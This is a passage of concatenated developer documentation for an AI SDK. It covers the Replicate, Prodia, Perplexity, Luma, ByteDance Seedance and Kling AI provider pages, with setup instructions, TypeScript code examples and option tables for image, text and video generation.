Inpainting with Mask

Edit specific parts of an image using a mask. For FLUX Fill models, white areas in the mask indicate where the image should be edited:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White = inpaint, black = keep

const { images } = await generateImage({
  model: replicate.image('black-forest-labs/flux-fill-pro'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
  providerOptions: {
    replicate: {
      guidance_scale: 7.5,
      num_inference_steps: 30,
    } satisfies ReplicateImageModelOptions,
  },
});

Multi-Reference Image Generation (Flux-2)

Flux-2 models support up to 8 input reference images for style transfer, composition, and multi-subject generation:

import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const reference1 = readFileSync('./style-reference.png');
const reference2 = readFileSync('./subject-reference.png');

const { images } = await generateImage({
  model: replicate.image('black-forest-labs/flux-2-pro'),
  prompt: {
    text: 'Combine the style and subjects from the reference images',
    images: [reference1, reference2],
  },
});

Provider Options

Common provider options for image generation:

maxWaitTimeInSeconds number - Maximum time in seconds to wait for the prediction to complete in sync mode. By default, Replicate uses sync mode with a 60-second timeout. Set to a positive number to use a custom duration (e.g., 120 for 2 minutes). When not specified, uses the default 60-second wait.
guidance_scale number - Guidance scale for classifier-free guidance. Higher values make the output more closely match the prompt.
num_inference_steps number - Number of denoising steps. More steps = higher quality but slower.
negative_prompt string - Negative prompt to guide what to avoid in the generation.
output_format 'png' | 'jpg' | 'webp' - Output image format.
output_quality number (1-100) - Output image quality. Only applies to jpg and webp.
strength number (0-1) - Strength of the transformation for img2img. Lower values keep more of the original image.

For more details, see the Replicate models page.

title: Prodia description: Learn how to use Prodia models with the AI SDK.

Prodia Provider

Prodia is a fast inference platform for generative AI, offering high-speed image generation with FLUX and Stable Diffusion models.

Setup

The Prodia provider is available via the @ai-sdk/prodia module. You can install it with

Provider Instance

You can import the default provider instance prodia from @ai-sdk/prodia:

import { prodia } from '@ai-sdk/prodia';

If you need a customized setup, you can import createProdia and create a provider instance with your settings:

import { createProdia } from '@ai-sdk/prodia';

const prodia = createProdia({
  apiKey: 'your-api-key', // optional, defaults to PRODIA_TOKEN environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Prodia provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://inference.prodia.com/v2.
apiKey string

API key that is being sent using the Authorization header as a Bearer token. It defaults to the PRODIA_TOKEN environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Prodia image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { writeFileSync } from 'node:fs';
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A cat wearing an intricate robe',
});

const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Model Capabilities

Prodia offers fast inference for various image generation models. Here are the supported model types:

Model	Description
`inference.flux-fast.schnell.txt2img.v2`	Fast FLUX Schnell model for text-to-image generation
`inference.flux.schnell.txt2img.v2`	FLUX Schnell model for text-to-image generation

Image Size

You can specify the image size using the size parameter in WIDTHxHEIGHT format:

import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A serene mountain landscape at sunset',
  size: '1024x768',
});

Provider Options

Prodia image models support additional options through the providerOptions.prodia object:

import { prodia, type ProdiaImageModelOptions } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A cat wearing an intricate robe',
  providerOptions: {
    prodia: {
      width: 1024,
      height: 768,
      steps: 4,
      stylePreset: 'cinematic',
    } satisfies ProdiaImageModelOptions,
  },
});

The following provider options are supported:

width number - Output width in pixels (256–1920). When set, this overrides any width derived from size.
height number - Output height in pixels (256–1920). When set, this overrides any height derived from size.
steps number - Number of computational iterations (1–4). More steps typically produce higher quality results.
stylePreset string - Apply a visual theme to the output image. Supported presets: 3d-model, analog-film, anime, cinematic, comic-book, digital-art, enhance, fantasy-art, isometric, line-art, low-poly, neon-punk, origami, photographic, pixel-art, texture, craft-clay.
loras string[] - Augment the output with up to 3 LoRA models.
progressive boolean - When using JPEG output, return a progressive JPEG.

Seed

You can use the seed parameter to get reproducible results:

import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A serene mountain landscape at sunset',
  seed: 12345,
});

Provider Metadata

The generateImage response includes provider-specific metadata in providerMetadata.prodia.images[]. Each image object may contain the following properties:

jobId string - The unique identifier for the generation job.
seed number - The seed used for generation. Useful for reproducing results.
elapsed number - Generation time in seconds.
iterationsPerSecond number - Processing speed metric.
createdAt string - Timestamp when the job was created.
updatedAt string - Timestamp when the job was last updated.

import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
  prompt: 'A serene mountain landscape at sunset',
});

// Access provider metadata
const metadata = providerMetadata?.prodia?.images?.[0];
console.log('Job ID:', metadata?.jobId);
console.log('Seed:', metadata?.seed);
console.log('Elapsed:', metadata?.elapsed);

title: Perplexity description: Learn how to use Perplexity's Sonar API with the AI SDK.

Perplexity Provider

API keys can be obtained from the Perplexity Platform.

Setup

The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:

Provider Instance

You can import the default provider instance perplexity from @ai-sdk/perplexity:

import { perplexity } from '@ai-sdk/perplexity';

For custom configuration, you can import createPerplexity and create a provider instance with your settings:

import { createPerplexity } from '@ai-sdk/perplexity';

const perplexity = createPerplexity({
  apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});

You can use the following optional settings to customize the Perplexity provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.perplexity.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the PERPLEXITY_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Perplexity models using a provider instance:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

Sources

Websites that have been used to generate the response are included in the sources property of the result:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

console.log(sources);

Provider Options & Metadata

The Perplexity provider includes additional metadata in the response through providerMetadata. Additional configuration options are available through providerOptions.

const result = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
  providerOptions: {
    perplexity: {
      return_images: true, // Enable image responses (Tier-2 Perplexity users only)
      search_recency_filter: 'week', // Filter search results by recency
    },
  },
});

console.log(result.providerMetadata);
// Example output:
// {
//   perplexity: {
//     usage: { citationTokens: 5286, numSearchQueries: 1 },
//     images: [
//       { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
//       { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
//     ]
//   },
// }

Provider Options

The following provider-specific options are available:

return_images boolean

Enable image responses. When set to true, the response may include relevant images. This feature is only available to Perplexity Tier-2 users and above.
search_recency_filter string

Filter search results by recency. Possible values: 'hour', 'day', 'week', 'month'. If not specified, defaults to all time.

Provider Metadata

The response metadata includes:

usage: Object containing citationTokens and numSearchQueries metrics
images: Array of image objects when return_images is enabled (Tier-2 users only). Each image contains imageUrl, originUrl, height, and width.

PDF Support

The Perplexity provider supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: perplexity('sonar-pro'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is this document about?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass the URL of a PDF:

{
  type: 'file',
  data: new URL('https://example.com/document.pdf'),
  mediaType: 'application/pdf',
  filename: 'document.pdf', // optional
}

The model will have access to the contents of the PDF file and respond to questions about it.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`sonar-deep-research`
`sonar-reasoning-pro`
`sonar-reasoning`
`sonar-pro`
`sonar`

title: Luma description: Learn how to use Luma AI models with the AI SDK.

Luma Provider

Setup

The Luma provider is available via the @ai-sdk/luma module. You can install it with

Provider Instance

You can import the default provider instance luma from @ai-sdk/luma:

import { luma } from '@ai-sdk/luma';

If you need a customized setup, you can import createLuma and create a provider instance with your settings:

import { createLuma } from '@ai-sdk/luma';

const luma = createLuma({
  apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Luma provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.lumalabs.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the LUMA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Luma image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { luma, type LumaImageModelOptions } from '@ai-sdk/luma';
import { generateImage } from 'ai';
import fs from 'fs';

const { image } = await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Image Model Settings

You can customize the generation behavior with optional settings:

const { image } = await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
  providerOptions: {
    luma: {
      pollIntervalMillis: 5000, // How often to check for completed images (in ms)
      maxPollAttempts: 10, // Maximum number of polling attempts before timeout
    },
  } satisfies LumaImageModelOptions,
});

Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:

maxImagesPerCall number

Override the maximum number of images generated per API call. Defaults to 1.
pollIntervalMillis number

Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
maxPollAttempts number

Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.

Model Capabilities

Luma offers two main models:

Model	Description
`photon-1`	High-quality image generation with superior prompt understanding
`photon-flash-1`	Faster generation optimized for speed while maintaining quality

Both models support the following aspect ratios:

1:1
3:4
4:3
9:16
16:9 (default)
9:21
21:9

For more details about supported aspect ratios, see the Luma Image Generation documentation.

Key features of Luma models include:

Ultra-high quality image generation
10x higher cost efficiency compared to similar models
Superior prompt understanding and adherence
Unique character consistency capabilities from single reference images
Multi-image reference support for precise style matching

Image editing

Luma supports different modes of generating images that reference other images.

Modify an image

Images have to be passed as URLs. weight can be configured for each image in the providerOptions.luma.images array.

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'transform the bike to a boat',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  providerOptions: {
    luma: {
      referenceType: 'modify_image',
      images: [{ weight: 1.0 }],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#modify-image.

Reference an image

Use up to 4 reference images to guide your generation. Useful for creating variations or visualizing complex concepts. Adjust the weight for each image (0-1) to control the influence of reference images.

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  aspectRatio: '1:1',
  providerOptions: {
    luma: {
      referenceType: 'image',
      images: [{ weight: 0.8 }],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#image-reference

Style Reference

Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'A blue cream Persian cat launching its website on Vercel',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  aspectRatio: '1:1',
  providerOptions: {
    luma: {
      referenceType: 'style',
      images: [{ weight: 0.8 }],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#style-reference

Character Reference

Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'A woman with a cat riding a broomstick in a forest',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  aspectRatio: '1:1',
  providerOptions: {
    luma: {
      referenceType: 'character',
      images: [
        {
          id: 'identity0',
        },
      ],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#character-reference

title: ByteDance description: Learn how to use ByteDance Seedance video models with the AI SDK.

ByteDance Provider

The ByteDance provider contains support for the Seedance family of video generation models through the BytePlus ModelArk platform. Seedance provides high-quality text-to-video and image-to-video generation capabilities, including audio-video synchronization, first-and-last frame control, and multi-reference image generation.

Setup

The ByteDance provider is available via the @ai-sdk/bytedance module. You can install it with

Provider Instance

You can import the default provider instance byteDance from @ai-sdk/bytedance:

import { byteDance } from '@ai-sdk/bytedance';

If you need a customized setup, you can import createByteDance and create a provider instance with your settings:

import { createByteDance } from '@ai-sdk/bytedance';

const byteDance = createByteDance({
  apiKey: 'your-api-key', // optional, defaults to ARK_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the ByteDance provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://ark.ap-southeast.bytepluses.com/api/v3.
apiKey string

API key that is being sent using the Authorization header. It defaults to the ARK_API_KEY environment variable. You can obtain an API key from the BytePlus console.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Video Models

You can create ByteDance video models using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

Text-to-Video

Generate videos from text prompts:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-0-pro-250528'),
  prompt:
    'Photorealistic style: Under a clear blue sky, a vast expanse of white daisy fields stretches out. The camera gradually zooms in and fixates on a close-up of a single daisy.',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    bytedance: {
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

console.log(video.url);

Image-to-Video

Generate videos from a first-frame image with an optional text prompt:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: {
    image: 'https://example.com/first-frame.png',
    text: 'The cat slowly turns its head and blinks',
  },
  duration: 5,
  providerOptions: {
    bytedance: {
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Image-to-Video with Audio

Seedance 1.5 Pro supports generating synchronized audio alongside the video:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: {
    image: 'https://example.com/pianist.png',
    text: 'A young man sits at a piano, playing calmly. Gentle piano music plays in sync with his movements.',
  },
  duration: 5,
  providerOptions: {
    bytedance: {
      generateAudio: true,
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

First-and-Last Frame Video

Generate smooth transitions between a starting and ending keyframe image:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: {
    image: 'https://example.com/first-frame.jpg',
    text: 'Create a 360-degree orbiting camera shot based on this photo',
  },
  duration: 5,
  providerOptions: {
    bytedance: {
      lastFrameImage: 'https://example.com/last-frame.jpg',
      generateAudio: true,
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Multi-Reference Image-to-Video

Using the Seedance 1.0 Lite I2V model, you can provide multiple reference images (1-4) that the model uses to faithfully reproduce object shapes, colors, and textures:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-0-lite-i2v-250428'),
  prompt:
    'A boy wearing glasses and a blue T-shirt from [Image 1] and a corgi dog from [Image 2], sitting on the lawn from [Image 3], in 3D cartoon style',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    bytedance: {
      referenceImages: [
        'https://example.com/boy.png',
        'https://example.com/corgi.png',
        'https://example.com/lawn.png',
      ],
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Reference Video

Seedance 2.0 supports reference videos that guide the style, motion, or composition of the generated video:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('dreamina-seedance-2-0-260128'),
  prompt:
    'First-person perspective promotional ad, using the composition and camera movement from the reference video',
  aspectRatio: '16:9',
  duration: 4,
  providerOptions: {
    bytedance: {
      referenceVideos: ['https://example.com/reference-video.mp4'],
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Reference Audio

Seedance 2.0 supports reference audio that is used as background music or sound for the generated video:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('dreamina-seedance-2-0-260128'),
  prompt:
    'A serene mountain landscape at sunrise with gentle camera movement',
  aspectRatio: '16:9',
  duration: 4,
  providerOptions: {
    bytedance: {
      referenceAudio: ['https://example.com/background-music.mp3'],
      generateAudio: true,
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Video Provider Options

The following provider options are available via providerOptions.bytedance:

Generation Options

watermark boolean

Whether to add a watermark to the generated video.
generateAudio boolean

Whether to generate synchronized audio for the video. Only supported by Seedance 1.5 Pro.
cameraFixed boolean

Whether to fix the camera during generation.
returnLastFrame boolean

Whether to return the last frame of the generated video. Useful for chaining consecutive videos.
serviceTier 'default' | 'flex'

Inference tier. 'default' for online inference. 'flex' for offline inference at 50% of the price, with higher latency (response times on the order of hours).
draft boolean

Enable draft sample mode for low-cost preview generation. Only supported by Seedance 1.5 Pro. Generates a 480p preview video for rapid iteration before committing to a full-quality generation.

Image Input Options

lastFrameImage string

URL of the last frame image for first-and-last frame video generation. The model generates smooth transitions between the first frame (provided via the image prompt) and this last frame. Supported by Seedance 1.5 Pro, 1.0 Pro, and 1.0 Lite I2V.
referenceImages string[]

Array of reference image URLs (1-4 images) for multi-reference image-to-video generation. The model extracts key features from each image and reproduces them in the video. Use [Image 1], [Image 2], etc. in your prompt to reference specific images. Supported by Seedance 1.0 Lite I2V.

Media Reference Options

referenceVideos string[]

Array of reference video URLs (up to 3 videos, max 15 seconds each) for reference-guided video generation. The model uses the referenced videos to guide style, motion, or composition. Supported by Seedance 2.0.
referenceAudio string[]

Array of reference audio URLs (up to 3, max 15 seconds each) for audio-guided video generation. The model uses the referenced audio as background music or synchronized sound. Supports data URIs (e.g., data:audio/wav;base64,...). Supported by Seedance 2.0.

Polling Options

pollIntervalMs number

Control how frequently the API is checked for completed videos while they are being processed. Defaults to 3000ms.
pollTimeoutMs number

Maximum time to wait for video generation to complete before timing out. Defaults to 300000ms (5 minutes).

Video Model Capabilities

Model	Model ID	Capabilities
Seedance 2.0	`dreamina-seedance-2-0-260128`	T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Duration: 4-15s. Resolution: 480p, 720p.
Seedance 2.0 Fast	`dreamina-seedance-2-0-fast-260128`	T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Optimized for speed. Duration: 4-15s. Resolution: 480p, 720p.
Seedance 1.5 Pro	`seedance-1-5-pro-251215`	T2V, I2V (first frame), I2V (first+last frame), audio-video sync, draft mode. Duration: 4-12s. Resolution: 480p, 720p, 1080p.
Seedance 1.0 Pro	`seedance-1-0-pro-250528`	T2V, I2V (first frame), I2V (first+last frame). Duration: 2-12s. Resolution: 480p, 720p, 1080p.
Seedance 1.0 Pro Fast	`seedance-1-0-pro-fast-251015`	T2V, I2V (first frame). Optimized for speed and cost. Duration: 2-12s.
Seedance 1.0 Lite (T2V)	`seedance-1-0-lite-t2v-250428`	Text-to-video only. Duration: 2-12s. Resolution: 480p, 720p, 1080p.
Seedance 1.0 Lite (I2V)	`seedance-1-0-lite-i2v-250428`	I2V (first frame), I2V (first+last frame), multi-reference images (1-4). Duration: 2-12s. Resolution: 480p, 720p.

Supported aspect ratios: 16:9, 4:3, 1:1, 3:4, 9:16, 21:9, adaptive (image-to-video only).

All models output MP4 video at 24 fps.

title: Kling AI description: Learn how to use the Kling AI provider for the AI SDK.

Kling AI Provider

The Kling AI provider contains support for Kling AI's video generation models, including text-to-video, image-to-video, motion control, and multi-shot video generation.

Setup

The Kling AI provider is available in the @ai-sdk/klingai module. You can install it with

Provider Instance

You can import the default provider instance klingai from @ai-sdk/klingai:

import { klingai } from '@ai-sdk/klingai';

If you need a customized setup, you can import createKlingAI from @ai-sdk/klingai and create a provider instance with your settings:

import { createKlingAI } from '@ai-sdk/klingai';

const klingai = createKlingAI({
  accessKey: 'your-access-key',
  secretKey: 'your-secret-key',
});

You can use the following optional settings to customize the Kling AI provider instance:

accessKey string

Kling AI access key. Defaults to the KLINGAI_ACCESS_KEY environment variable.
secretKey string

Kling AI secret key. Defaults to the KLINGAI_SECRET_KEY environment variable.
baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api-singapore.klingai.com.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Video Models

You can create Kling AI video models using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

This provider currently supports three video generation modes: text-to-video, image-to-video, and motion control.

Text-to-Video

Generate videos from text prompts:

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v2.6-t2v'),
  prompt: 'A chicken flying into the sunset in the style of 90s anime.',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    klingai: {
      mode: 'std',
    } satisfies KlingAIVideoModelOptions,
  },
});

Image-to-Video

Generate videos from a start frame image with an optional text prompt. The popular start+end frame feature is available via the imageTail option:

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v2.6-i2v'),
  prompt: {
    image: 'https://example.com/start-frame.png',
    text: 'The cat slowly turns its head and blinks',
  },
  duration: 5,
  providerOptions: {
    klingai: {
      // Pro mode required for start+end frame control
      mode: 'pro',
      // Optional: end frame image
      imageTail: 'https://example.com/end-frame.png',
    } satisfies KlingAIVideoModelOptions,
  },
});

Multi-Shot Video Generation

Generate videos with multiple storyboard shots, each with its own prompt and duration (Kling v3.0+):

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v3.0-t2v'),
  prompt: '',
  aspectRatio: '16:9',
  duration: 10,
  providerOptions: {
    klingai: {
      mode: 'pro',
      multiShot: true,
      shotType: 'customize',
      multiPrompt: [
        {
          index: 1,
          prompt: 'A sunrise over a calm ocean, warm golden light.',
          duration: '4',
        },
        {
          index: 2,
          prompt: 'A flock of seagulls take flight from the beach.',
          duration: '3',
        },
        {
          index: 3,
          prompt: 'Waves crash against rocky cliffs at sunset.',
          duration: '3',
        },
      ],
      sound: 'on',
    } satisfies KlingAIVideoModelOptions,
  },
});

Multi-shot also works with image-to-video by combining a start frame image with per-shot prompts.

Motion Control

Generate video by transferring motion from a reference video to a character image:

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v3.0-motion-control'),
  prompt: {
    image: 'https://example.com/character.png',
    text: 'The character performs a smooth dance move',
  },
  providerOptions: {
    klingai: {
      videoUrl: 'https://example.com/reference-motion.mp4',
      characterOrientation: 'image',
      mode: 'std',
      // Optional: reference element from element library (v3.0+, max 1)
      elementList: [{ element_id: 829836802793406551 }],
    } satisfies KlingAIVideoModelOptions,
  },
});

Video Provider Options

The following provider options are available via providerOptions.klingai. Options vary by mode — see the KlingAI Capability Map for per-model support.

Common Options

mode 'std' | 'pro'

Video generation mode. 'std' is cost-effective. 'pro' produces higher quality but takes longer.
pollIntervalMs number

Polling interval in milliseconds for checking task status. Defaults to 5000.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
watermarkEnabled boolean

Whether to generate watermarked results simultaneously.

Text-to-Video and Image-to-Video Options

negativePrompt string

A description of what to avoid in the generated video (max 2500 characters).
sound 'on' | 'off'

Whether to generate audio simultaneously. Only V2.6 and subsequent models support this, and requires mode: 'pro'.
cfgScale number

Flexibility in video generation. Higher values mean stronger prompt adherence. Range: [0, 1]. Not supported by V2.x models.
cameraControl object

Camera movement control with a type preset ('simple', 'down_back', 'forward_up', 'right_turn_forward', 'left_turn_forward') and optional config with horizontal, vertical, pan, tilt, roll, zoom values (range: [-10, 10]).
multiShot boolean

Enable multi-shot video generation (Kling v3.0+). When true, the video is split into up to 6 storyboard shots with individual prompts and durations.
shotType 'customize' | 'intelligence'

Storyboard method for multi-shot generation. 'customize' uses multiPrompt for user-defined shots. 'intelligence' lets the model auto-segment based on the main prompt. Required when multiShot is true.
multiPrompt Array<{index, prompt, duration}>

Per-shot details for multi-shot generation. Each shot has an index (number), prompt (string, max 512 characters), and duration (string, in seconds). Shot durations must sum to the total duration. Required when multiShot is true and shotType is 'customize'.
voiceList Array<{voice_id: string}>

Voice references for voice control (Kling v3.0+). Up to 2 voices. Reference via <<<voice_1>>> template syntax in the prompt. Requires sound: 'on'. Cannot coexist with elementList on the I2V endpoint.

Image-to-Video Only Options

imageTail string

End frame image for start+end frame control. Accepts an image URL or raw base64-encoded data. Requires mode: 'pro' for most models.
staticMask string

Static brush mask image for motion brush. Accepts an image URL or raw base64-encoded data.
dynamicMasks Array

Dynamic brush configurations for motion brush. Up to 6 groups, each with a mask (image URL or base64) and trajectories (array of {x, y} coordinates).

Image-to-Video and Motion Control Options

elementList Array<{element_id: number}>

Reference elements for element control (Kling v3.0+). Supports video character elements and multi-image elements. Up to 3 elements for I2V (cannot coexist with voiceList). Up to 1 element for motion control.

Motion Control Only Options

videoUrl string (required)

URL of the reference motion video. Supports .mp4/.mov, max 100MB, duration 3–30 seconds.
characterOrientation 'image' | 'video' (required)

Orientation of the characters in the generated video. 'image' matches the reference image orientation (max 10s video). 'video' matches the reference video orientation (max 30s video).
keepOriginalSound 'yes' | 'no'

Whether to keep the original sound from the reference video. Defaults to 'yes'.

Video Model Capabilities

Text-to-Video

Model	Description
`kling-v3.0-t2v`	Latest v3.0, multi-shot, voice control, sound (3-15s)
`kling-v2.6-t2v`	V2.6, sound in pro mode
`kling-v2.5-turbo-t2v`	Optimized for speed, std and pro
`kling-v2.1-master-t2v`	High-quality generation, pro only
`kling-v2-master-t2v`	Master-quality generation
`kling-v1.6-t2v`	V1.6 generation, std and pro
`kling-v1-t2v`	Original V1 model, supports camera control (std)

Image-to-Video

Model	Description
`kling-v3.0-i2v`	Latest v3.0, multi-shot, element/voice control, sound (3-15s)
`kling-v2.6-i2v`	V2.6, sound and end-frame in pro mode
`kling-v2.5-turbo-i2v`	Optimized for speed, end-frame in pro
`kling-v2.1-master-i2v`	High-quality generation, pro only
`kling-v2.1-i2v`	V2.1 generation, end-frame in pro
`kling-v2-master-i2v`	Master-quality generation
`kling-v1.6-i2v`	V1.6 generation, end-frame in pro
`kling-v1.5-i2v`	V1.5 generation, end-frame and motion brush in pro
